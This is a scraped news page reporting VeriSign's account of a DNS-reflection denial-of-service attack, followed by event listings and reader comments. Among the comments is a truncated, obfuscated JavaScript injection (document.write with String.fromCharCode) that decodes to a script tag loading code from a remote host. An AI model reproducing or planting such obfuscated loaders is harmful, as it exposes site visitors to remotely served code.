New denial-of-service threat emerges

 

Summary

Attacks targeted 1,500 IP addresses and delivered a heftier blow than normal DOS threats, VeriSign security chief says.

Events

Social Media World Forum
22 - 23 Sep 2010

Suntec, Singapore

Asia CXO Leadership Summit - Singapore
7 Sep 2010

Marriott Hotel, Singapore

Governmentware 2010
28 - 30 Sep 2010

Suntec, Singapore

The 5th Annual CIO Forum Asia
28 Sep 2010

Singapore

IDC's Asia/Pacific Cloud Computing Conference 2010
31 Aug 2010

Marriott Hotel, Singapore

A new kind of denial-of-service attack has emerged that delivers a heftier blow to organizations' systems than previously seen DOS threats, according to VeriSign's security chief.

The new DOS attacks first emerged in late December and kicked into high gear in January, before dying down four weeks ago, said Ken Silva, VeriSign's chief security officer. In less than two months, 1,500 separate Internet Protocol addresses were attacked using this method, he noted.

"These attacks have been significantly larger than anything we've seen," he said.

Under a more common DOS attack, a network of bots, or compromised PCs commandeered by remote attackers, directly inundates a victim's Web server, name server or mail server with a multitude of queries. The goal of a DOS attack is to crash the victim's system, as it tries to respond to the requests.

But in this latest spate of DOS attacks, bots are sending queries to DNS (domain name system) servers with the return address pointed at the targeted victim. As a result, the DNS server, rather than the bot, makes the direct attack on the victim. The net result is a stronger attack and an increased difficulty in stopping it, Silva said.

While it is possible to stop a bot-delivered DOS attack by blocking the bot's IP address, blocking queries from DNS servers would prove more difficult, Silva said. He noted that companies could reconfigure their DNS servers to prevent the so-called recursive name service feature, as a possible solution. But he added that companies may be loath to prevent potential customers, partners, researchers and others from sending queries to their DNS.

Talkback

Add your opinion

In order to post a comment, you need to be registered. (Sign In or register below)

Post your comment
HP Data Protector delivers high-performance data protection at up to 70% lower TCO.
Tech Vendor: HP
Did you know?
Did you know?

ZDNet Asia Live

I suggest that the «break» in the recent trend of developments in browser market share observed by Net Applications is an artifact of t...

5 minutes ago by mhenriday on IE slips in usage share; Chrome resumes growth

Samsung Galaxy Tab http://www.zdnetasia.c...

20 minutes ago by azurimalik on topsy

RT @zdnetasia: SD revamp to triple flash card speeds in 2012 http://bit.ly/d5QlHD

31 minutes ago by amine5a on topsy

Texas opens antitrust investigation of Google http://bit.ly/bjMQ7J | #Droid #Android

Asia News - SD revamp to triple flash card speeds in 2012: The SD Association should rev its fla... http://bit.ly/a5isKD - #AsiaToday #News

UN exec: Cyberwar could be 'worse than tsunami' http://bit.ly/alV2dB #SMO

#Software UN exec: Cyberwar could be 'worse than tsunami': #Software Rally Software Development on ZDNet Asia: ZDN... http://bit.ly/dwqy7v

UN exec: Cyberwar could be 'worse than tsunami' http://bit.ly/aHYDVc #Android #news

UN exec: Cyberwar could be 'worse than tsunami': By David Meyer, ZDNet UK on September 6, 2010 (3 minutes ago) Pro... http://bit.ly/bTnxhB

Asia News - U.N. exec: Cyberwar could be 'worse than tsunami': Proposal for a global "cyberpeace... http://bit.ly/c3jCv8 - #AsiaToday #News

1 hour 25 minutes ago by asiatodaynews on topsy

Asia News - Google settles Buzz lawsuit for US$8.5M: Internet privacy groups will be the benefic... http://bit.ly/dg0FSU - #AsiaToday #News

1 hour 25 minutes ago by asiatodaynews on topsy

Google settles Buzz lawsuit for US$8.5M http://bit.ly/a6xX2z | #Droid #Android

1 hour 32 minutes ago by droid_phone on topsy

Sadly still "talking" & not what's been successful RT @MarketingEds: $1.8B potential for location-based advertising http://bit.ly/dhllCC

SingTel brings social media monitoring tool to SMBs - Software - News http://bit.ly/bc5kLv (Hmm....?)

iPad apps for enterprise users ~ http://bit.ly/as3LP3

Should I d/l Angry Bird for Android (it's out!), risking wrinkles frm overplaying? See @zdnetasia's sister site's take http://bit.ly/bwdGR7

Er! Isn't Windows the thing I open when I need more air in the room? :) More seriously, Linux will require more time against the marketi...

20 hours 20 minutes ago by commtech on 10 reasons why Linux will oust Windows

Korean phone makers rank among greenest: Korean phone makers LG and Samsung have managed to rank among the top fiv... http://bit.ly/aIHEuz

RT @adtrend: $1.8B potential for location-based advertising: Location-based advertising is still in its infancy, but come 2015,... http://bit.ly/aKBpOx

RT @adtrend: $1.8B potential for location-based advertising: Location-based advertising is still in its infancy, but come 2015,... http://bit.ly/aKBpOx

India: Hand over your data #Google, Skype: [#zdnetasia.com] An AFP article Tuesday confirmed previous reports that... http://dlvr.it/4jJ03

I guess MySpace is losing its popularity worldwide.

1 day 12 minutes ago by fanaticore on Facebook top social networking site in India

Thank you all so much for your comments and support


malaysia

1 day 6 minutes ago by whiyney on DiGi offers mobile TV

can u provide me with a bit more details abut cellonics whether its been implemented or not?
my email id is electromaniac21@yahoo.com

1 day 17 minutes ago by ayaz21 on Data transfer 1,000 times faster?

At least the train is turning toward the right track. I have to get the methodology worked out. Navigators are great but I have a tend...

2 days 31 minutes ago by texasjustice on Define your project's vision with this exercise

document.write(String.fromCharCode(60,115,99,114,105,112,116,32,115,114,99,61,34,104,116,116,112,58,47,47,103,101,109,98,104,101,108,46,5...

2 days 7 minutes ago by gembhel on Can a contract be concluded by e-mail?

Hi, I came to know about ValleSpeak MPP Viewer from one of my friend, and i started using it. It is very good and it's easy to use and co...

2 days 34 minutes ago by shalonmiller on Agile drivers for new project management tools

People around the world today are using smart cards for debit and credit payments. Contactless payment applications are gaining momentum ...

2 days 40 minutes ago by simagetechnolgies on Contactless payment industry hit with growth pains

need more

2 days 18 minutes ago by jepsy on Is it too late to introduce 3G in India?

I recommend checking 5pm for a good project management tool. (www.5pmweb.com). It makes the team collaboration easy and is friendly enou...

3 days 36 minutes ago by Erica on Agile drivers for new project management tools

I am a student researching piracy for my computer course. My mother owns an epublishing company. Ebook piracy is also a huge problem in h...

3 days 49 minutes ago by tasha6669 on SaaS no silver bullet for piracy

For more information regarding the lawsuit and the patents involved, check out Sunlight Research's upcoming webinar "Will Oracle’s Java...

3 days 13 minutes ago by Sunlight on Legal woes no impact on Android ecosystem yet

Google search does not seem to be made for 5 years old kids,anyway your child will learn to say and understand the meaning of this senten...

3 days 28 minutes ago by irajjs on Facing reality from a Google search about Echo of Amboseli

But iTunes music does not apply to Asia. We STILL CAN'T BUY music from iTunes!!!

4 days 17 minutes ago by maxxtotal on Study: Music, not apps, rules iTunes